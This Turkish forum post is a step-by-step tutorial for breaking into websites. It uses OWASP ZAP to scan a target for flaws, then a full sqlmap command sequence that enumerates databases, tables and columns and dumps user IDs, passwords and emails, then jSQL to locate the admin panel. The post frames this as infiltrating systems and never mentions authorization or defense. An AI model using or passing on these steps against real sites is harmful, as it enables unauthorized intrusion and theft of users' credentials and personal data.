Owasp ile nasıl web site acıklarını bulmak

Web Güvenlik Açıkları'nın paylaşıldığı bölüm.
Cevapla
Başbug Attila
Onbaşı
Onbaşı
Mesajlar: 4
Kayıt: 12 Eyl 2020, 22:22
Been thanked: 1 time

Owasp ile nasıl web site acıklarını bulmak

Mesaj gönderen Başbug Attila »

Herkese Merhaba,Sizlere Owasp ile web site güvenlik acıklarını bulmayı ve bu acıklardan faydalanmayı göstericem güvenlik acıklarını kastedigimde (SQL,XSS,HTML VB...)

Şimdi İlk Olarak Kali Linux u indirmek gerekir onun içinde https://www.kali.org/downloads/
Bunun İçin Sanal Makina Lazım https://www.virtualbox.org/ https://www.vmware.com/tr.html
Ve Sonra Linuxu Kurmak için ise https://www.mshowto.org/adim-adim-kali- ... ulumu.html

Şimdi Gelelim İşlemlerimize

1-ilk olarak terminali acıp owasp-zap yazıyoruz ve programımızın açılmasını bekliyoruz acıldıktan sonra herşeye hayır diyorsunuz
2-acıldıktan sonra ordaki yıldırım işaretine tıklıyorsunuz ve sitemizi yazıyoruz ve attack a tıklıyoruz
3-Acıkları taramaya başlıyor biraz bekleyiniz
4-Taramalar Bittikten Sonra Ordaki Bayrağa tıklıyoruz (sol tarafta uyarılar diyor orası )
5-Ordaki en kırmızı bölümü seçin en cok işimize yarayacak ve sisteme müdahele edecek acıklar orda
6-ve owasp ile son adımımız oranın içindeki acıklar ile sisteme sızmayı deneyin

--------------------SQLMAP---------------

1-Şimdi buldugumuz acıklar ile sisteme sızıcaz bunun için terminale gidip sqlmap i calıstırmamız lazım
2-bunun için sqlmap -u http://www.siteadı.com/index.php?id=2 --threads=10 --random-agent --dbs komutlar bunlar index yerine başka birşeyde olabilir sizde ne varsa onu girin
3-verileri aldıgımız zaman sqlmap -u http://www.siteadı.com/index.php?id=2 --threads=10 --random-agent --dbs -D tabloda cıkan isim --tables
4-Sonraki komutumuza gelelim sqlmap -u http://www.siteadı.com/index.php?id=2 --threads=10 --random-agent --dbs -D tabloda cıkan isim --tables -T tablo --columns bu komutla Tabloları elde etmiş oluruz
5-Gelelim son adımımıza sqlmap -u http://www.siteadı.com/index.php?id=2 --threads=10 --random-agent --dbs -D tabloda cıkan isim --T tablo -C burada sizde ne cıktıysa mesela user_id,user_password,user_email böyle yazıcaksınız ama sizde ne cıktıysa onları yazıcaksınız
6-En Son Adımımız ise admin panelini bulmaktır onun için JSQL adlı toolumuz lazım kurmak için terminalimizi acıp sudo apt-get install jsql yazarak kurabilirsiniz
calıstırmak için ise jsql yazabilirsiniz
7-JSQL yazdıktan sonra admin page kısmına gelerek üst tarafta sızmak istedigimiz sitenin linkini yapıstırın ve taramaya başlayın

Yardımcı Olduysam Bir Teşekürünüzü alırım sorunuz varsa yazınız

Cevapla